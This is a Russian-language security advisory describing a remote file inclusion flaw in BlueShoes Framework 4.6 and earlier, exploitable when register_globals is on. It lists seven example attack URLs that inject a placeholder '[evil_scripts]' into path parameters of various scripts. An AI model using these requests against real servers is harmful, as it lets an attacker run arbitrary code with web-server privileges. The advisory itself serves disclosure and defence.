Программа: BlueShoes Framework 4.6 и более ранние версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "APP[path][applications]" в сценарии applications/faq/Bs_Faq.class.php, в параметре "APP[path][plugins]" в сценарии applications/websearchengine/Bs_Wse_Profile.class.php, и в параметре "APP[path][core]" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://victim/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]
http://victim/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]
http://victim/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]
http://victim/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]
http://victim/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]
http://victim/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]
http://victim/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]
 



Оставить мнение